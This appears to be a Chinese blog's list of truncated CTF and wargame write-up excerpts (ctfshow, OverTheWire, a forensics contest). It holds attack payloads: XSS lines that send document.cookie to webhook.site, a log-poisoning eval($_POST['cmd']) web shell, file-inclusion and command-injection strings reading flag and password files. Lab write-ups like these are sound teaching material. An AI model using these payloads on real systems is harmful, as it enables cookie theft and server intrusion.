ctfshow 爆破
第21-第22关第21关
首先他给了我们一个字典,然后我们就可以根据他给的字典爆破
他的认证方式是这样的
首先我们抓包,抓的是用户名和密码那个界面的包
所以我们可以发现在这里我们发现多了一行奇怪的东西发现他是以admin:XXX的格式去显示的,我们后续准备爆破的时候需要记住这个格式。准备开始爆破,在这里先对bp的intruder模块进行介绍Payload position (载荷位置) :选择你需要爆破的位置这里给了你几个选项,Add Clear Auto 分别是增加,清除和自动bp选中方式是把你光标选中后的字符串包裹比如你的光标在这里,我们添加以后就会遇到这种情况他是成对的添加,所以我们需要爆破那一个字符串的话,我们就需要用光标选中那一串字符串就像这样我们在添加的时候就会把这串字符串包裹上
Payload type (载荷类型):决定了数据的生成方式。图中当前选择的是 Simple list (简单列表),即手动或导入一列字符串。Burp 还支持很多其他类型,比如 Numbers(数字递增)、Dates(日期生成)、Bruteforcer(字符组合爆破)等
1234567891011 ...
ctfshow 信息收集
本篇wp由小睿孩所写,已获得xrh同意上传!同时也感谢xrh的编写
第1关-第5关第1关
靶场进去是这样的,然后查看网页源代码
ctfshow{5c545075-c0dd-4338-8bd8-6f6cadedd007}
第2关
第一种解法:进去以后发现查看不了网页源代码
但是可以按crtl+u 查看
js前台拦截 === 无效操作
第二种解法:
ctrl + shift + i 打开开发者工具
第三种解法:
手动输入view-source协议:即可查看
第3关首先进去界面
先抓包,开启拦截
将 Intercept 的选项变成on就可以了,如果是页面已经进去的情况下,那么重新刷新即可
然后右击
点击 send to repeater
得到返回的数据
成功得到flag,同样的在Inspector里可以看到返回包的细节,也可以看到flag
第4关题目让我们查看robots,那么我们直接在url后面输入robot.txt
然后可以看到他给了一个路径
flagishere.txt,然后我们接着找
ctfshow{b95d7838-10a3-414b-814b-c0bc5a25231f ...
2026FIC预选赛
检材:百度网盘链接:https://pan.baidu.com/s/1UV8K7PiakhvYNrTool__YA提取码:ha86校验值sha256:830d0227bd16768648245e1aefe5d6583dd1d077b43b86422066b198ea169efavc密码:FIC-{e404d6e66586e9460c23755afab5a872bcf78ab4}
题目一共53题
pc10题,手机17,服务器17,互联网3,二进制5
计算机部分1.分析计算机检材,操作系统版本号为【参考格式:1.1】
23.1
2.分析计算机检材,李安弘曾收到一份免费领取token的邮件的疑似钓鱼邮件,其发送用户邮箱为【参考格式:123\@qq.com】
hf13338261292\@outlook.com
3.分析计算机检材,李安弘电脑中记录的黄金换现金的商家联系方式为【参考格式:110】13612817854
4.分析计算机检材,推广设计图中的apk下载链接为【参考格式:http:///?\*】https://drive.google.com/file/d/1z3aRS-lkaJYK ...
ctfshow xss漏洞
第316关-第321关第316关直接使用webhook输入1234<script> var img = new Image(); img.src = "https://webhook.site/你的专属ID?cookie=" + btoa(document.cookie);</script>
然后正常等就行,一般会刷新几轮刷出来
第317关对script的绕过,换一个测试语句就好<svg onload="new Image().src='https://webhook.site/你的专属ID?cookie=' + btoa(document.cookie)">
第318关和前面一样的没啥好说
ctfshow xxe漏洞
第373关-378关第373关1234567891011121314151617181920212223<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2021-01-07 12:59:52# @Last Modified by: h1xa# @Last Modified time: 2021-01-07 13:36:47# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);libxml_disable_entity_loader(false);$xmlfile = file_get_contents('php://input');if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_i ...
ctfshow文件包含漏洞
第78题-第83题第78题直接file=php://filter/read=convert.base64-encode/resource=flag.php,然后命令行解密
或者使用data伪协议
第79题可以使用短标签绕过file=data://text/plain,<?=system('tac flag.php');?>
或者base64编码一下也可以
第80题日志投毒,没啥好说的ua改成Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0<?php @eval($_POST['cmd']); ?>
payload改成?file=/var/log/nginx/access.log&2=phpinfo();
结束
最后我结合蚁剑
第81题
依旧日志包含
第82题
ctfshow命令执行漏洞
第29关-第34关第29关123456789101112131415161718192021<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 00:26:48 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); ...
overthewire leviathan靶场
第0关第0关挺简单的,就是正常访问隐藏路径就行
第1关第1关通过IDA逆向可得密码是:sex
输入可得
第2关
这里需要用到命令注入,由于程序没有过滤你的输入,直接把输入拼接到 system() 函数中执行了
创建一个免费的目录,用软链接进行
此时命令变成了"touch /etc/leviathan_pass/leviathan3 b"
很明显跨权限读取到了文件
第3关这里感觉可能是想初步感受一下栈
其实就是很简单的一个函数的跳转
第4关
直接解密可得
第5关和前面差不多,创造软链接来迷惑程序
第6关不用多说,一个比较就行了
overthewire natas靶场
第0关在html代码中,右击获取就行
第1关禁右键了,加上vview--soource
第2关这里,说明files下有路径,查看可得
第3关还是信息泄露在 Web 开发中,如果你想告诉搜索引擎的爬虫(比如 Googlebot)不要去抓取网站的某些特定目录或文件,通常会在网站的根目录下放置一个特殊的文件。
第4关referer伪造
第5关cookie伪造
第6关
第7关路径穿越
第8关
这里是先对密码进行base64加密,然后反转,最后转hex,所以
第9关命令执行漏洞http://natas9.natas.labs.overthewire.org/index.php?needle=%3B+cat%20/etc/natas_webpass/natas10+%22%22+%3B&submit=Search
第10关
这里其实还考察了php grep的多文件扫描机制
grep -i .* /etc/natas_webpass/natas11 dictionary.txt这样一来,grep 就把这段命令解析成了:
要搜索的内容: .* (正则表达式,代表匹配任意字符)
搜索目 ...
overthewire Bandit靶场
xrh推荐的基础靶场,来玩一玩
第0关挺简单的,不说了
第1关
这里有linux的特殊符号’-‘号
这种情况下直接cta ./-
第2关--spaces in this filename--文件,加了空格
之前./就不行了,会被终端识别为多个文件,只能cat ./"--spaces in this filename--"
第3关
第4关
需要使用file查看文本文件
正常输出即可
第5关有提示1find . -type f -size 1033c
然后1cat "./maybehere07/.file2"
第6关
其中2>/dev/null是说错误输出就不弹出
第7关
第8关
第9关1strings data.txt
strings命令,用于查看文件可识别字符串
第10关
第11关考凯撒密码
第12关考解压缩就是一直解压-file-解压到最后就行
第13关考察ssh命令
这里说了本地无法连接,必须退到本地连接看看私钥文件
创建好文件后用ssh连接就行,注意如果报错的话应该是权限问题,改一下权限就好了
第14关
第15关使用ssl连接
1op ...








